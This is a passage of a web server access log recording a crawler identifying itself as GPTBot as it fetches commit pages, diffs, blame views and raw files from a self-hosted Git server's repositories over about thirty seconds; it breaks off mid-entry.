[Gzip 13.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 17026] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f" +[17/Feb/2026:13:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 217024] [Gzip 13.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" +[17/Feb/2026:13:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/main...main" [Client 74.7.227.38] [Length 8397] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/main...a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 211457] [Gzip 13.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb" +[17/Feb/2026:13:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 2253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:13:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea?files=git%20%ec%84%9c%eb%b2%84%20%ec%82%ac%ec%9a%a9%eb%b2%95%20%eb%8c%80%ed%99%94%20%eb%b3%b4%ea%b4%80" [Client 74.7.227.38] [Length 18077] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:13:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" [Client 74.7.227.38] [Length 14567] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" +[17/Feb/2026:13:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/mail_contact.py" [Client 74.7.227.38] [Length 3922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/mail_contact.py" +[17/Feb/2026:13:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/update_status.py" +[17/Feb/2026:13:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/mail_contact.py" [Client 74.7.227.38] [Length 18811] [Gzip 9.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/mail_contact.py" +[17/Feb/2026:13:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/update_status.py" +[17/Feb/2026:13:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/update_status.py" +[17/Feb/2026:13:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/mail_contact.py" [Client 74.7.227.38] [Length 18811] [Gzip 9.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/mail_contact.py" +[17/Feb/2026:13:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/mail_contact.py" [Client 74.7.227.38] [Length 3922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/mail_contact.py" +[17/Feb/2026:13:30:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/About.tsx" +[17/Feb/2026:13:30:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 35972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp2.md" +[17/Feb/2026:13:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 9509] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:13:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/find/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" [Client 74.7.227.38] [Length 7515] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" +[17/Feb/2026:13:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.gitignore" [Client 74.7.227.38] [Length 11109] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" +[17/Feb/2026:13:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" [Client 74.7.227.38] [Length 16032] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" +[17/Feb/2026:13:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" [Client 74.7.227.38] [Length 11421] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" +[17/Feb/2026:13:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a.diff" [Client 74.7.227.38] [Length 135523] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" +[17/Feb/2026:13:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a.patch" [Client 74.7.227.38] [Length 136094] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" +[17/Feb/2026:13:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10105] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" +[17/Feb/2026:13:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=npm%2fdata%2flogs" [Client 74.7.227.38] [Length 23402] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +[17/Feb/2026:13:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues" [Client 74.7.227.38] [Length 10095] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/forks" +[17/Feb/2026:13:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/Dockerfile" [Client 74.7.227.38] [Length 11576] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" +[17/Feb/2026:13:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html?display=rendered" [Client 74.7.227.38] [Length 14339] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" +[17/Feb/2026:13:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html?display=rendered" [Client 74.7.227.38] [Length 14334] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" +[17/Feb/2026:13:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.gitignore" [Client 74.7.227.38] [Length 119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.gitignore" +[17/Feb/2026:13:30:22 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" +[17/Feb/2026:13:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 12450] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" +[17/Feb/2026:13:30:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 10833] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" +[17/Feb/2026:13:30:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 12754] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" +[17/Feb/2026:13:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 16153] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" +[17/Feb/2026:13:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 10077] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" +[17/Feb/2026:13:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 13428] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" +[17/Feb/2026:13:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones" [Client 74.7.227.38] [Length 8459] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" +[17/Feb/2026:13:30:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 14277] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" +[17/Feb/2026:13:30:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/Dockerfile" [Client 74.7.227.38] [Length 10761] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/Dockerfile" +[17/Feb/2026:13:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/labels" [Client 74.7.227.38] [Length 7623] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" +[17/Feb/2026:13:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" [Client 74.7.227.38] [Length 10087] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" +[17/Feb/2026:13:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 11874] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile" +[17/Feb/2026:13:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 859] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile" +[17/Feb/2026:13:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 259718] [Gzip 13.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:13:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 9927] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:13:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 237700] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:13:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 15449] [Gzip 8.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md" +[17/Feb/2026:13:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:13:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 14868] [Gzip 9.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:13:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 2208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:13:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 5009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py" +[17/Feb/2026:13:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 10122] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 